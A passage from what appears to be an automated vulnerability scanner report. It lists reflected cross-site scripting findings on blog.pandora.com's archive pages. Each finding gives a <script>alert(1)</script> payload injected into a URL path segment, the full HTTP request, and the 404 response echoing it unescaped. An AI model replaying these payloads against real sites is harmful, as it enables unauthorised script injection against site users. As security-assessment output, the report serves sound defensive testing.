Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/07a9e3c<script>alert(1)</script>20dad2bc554/ was not found on this server.</p>
...[SNIP]...

3.165. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56d79<script>alert(1)</script>a4032462556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:43 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora56d79<script>alert(1)</script>a4032462556/archives/2008/08/ was not found on this server.</p>
...[SNIP]...

3.166. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25bf5<script>alert(1)</script>3d971d76d88 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives25bf5<script>alert(1)</script>3d971d76d88/2008/08/ was not found on this server.</p>
...[SNIP]...

3.167. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5abe6<script>alert(1)</script>db42742e74 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:47 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 348
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20085abe6<script>alert(1)</script>db42742e74/08/ was not found on this server.</p>
...[SNIP]...

3.168. http://blog.pandora.com/pandora/archives/2008/08/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 70934<script>alert(1)</script>e46d04bff1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:51 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/0870934<script>alert(1)</script>e46d04bff1b/ was not found on this server.</p>
...[SNIP]...

3.169. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ac95c<script>alert(1)</script>f39701078da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraac95c<script>alert(1)</script>f39701078da/archives/2008/09/ was not found on this server.</p>
...[SNIP]...

3.170. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb2c5<script>alert(1)</script>2ae1ae68fdb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archiveseb2c5<script>alert(1)</script>2ae1ae68fdb/2008/09/ was not found on this server.</p>
...[SNIP]...

3.171. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e57ea<script>alert(1)</script>aa701cd74e3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008e57ea<script>alert(1)</script>aa701cd74e3/09/ was not found on this server.</p>
...[SNIP]...

3.172. http://blog.pandora.com/pandora/archives/2008/09/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/09/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 500d6<script>alert(1)</script>b55ef145dcc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/09500d6<script>alert(1)</script>b55ef145dcc/ was not found on this server.</p>
...[SNIP]...

3.173. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 872c8<script>alert(1)</script>e32ca06f3d3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:48 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora872c8<script>alert(1)</script>e32ca06f3d3/archives/2008/10/ was not found on this server.</p>
...[SNIP]...

3.174. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 69a72<script>alert(1)</script>b4e2002f078 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:53 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives69a72<script>alert(1)</script>b4e2002f078/2008/10/ was not found on this server.</p>
...[SNIP]...

3.175. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c1a34<script>alert(1)</script>3e603248071 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:57 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008c1a34<script>alert(1)</script>3e603248071/10/ was not found on this server.</p>
...[SNIP]...

3.176. http://blog.pandora.com/pandora/archives/2008/10/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/10/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ef2f7<script>alert(1)</script>b77f6aa2ff0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:02 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/10ef2f7<script>alert(1)</script>b77f6aa2ff0/ was not found on this server.</p>
...[SNIP]...

3.177. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 685f7<script>alert(1)</script>b71e5ef0a26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora685f7<script>alert(1)</script>b71e5ef0a26/archives/2008/11/ was not found on this server.</p>
...[SNIP]...

3.178. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bce64<script>alert(1)</script>e78182be82 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesbce64<script>alert(1)</script>e78182be82/2008/11/ was not found on this server.</p>
...[SNIP]...

3.179. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6e4b2<script>alert(1)</script>1ff330e9b26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20086e4b2<script>alert(1)</script>1ff330e9b26/11/ was not found on this server.</p>
...[SNIP]...

3.180. http://blog.pandora.com/pandora/archives/2008/11/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3a15c<script>alert(1)</script>5c048a41cfa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2008/113a15c<script>alert(1)</script>5c048a41cfa/ was not found on this server.</p>
...[SNIP]...

3.181. http://blog.pandora.com/pandora/archives/2008/12/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2008/12/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8089c<script>alert(1)</script>6c11535c8eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8089c<script>alert(1)</script>6c11535c8eb/archives/2008/12/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
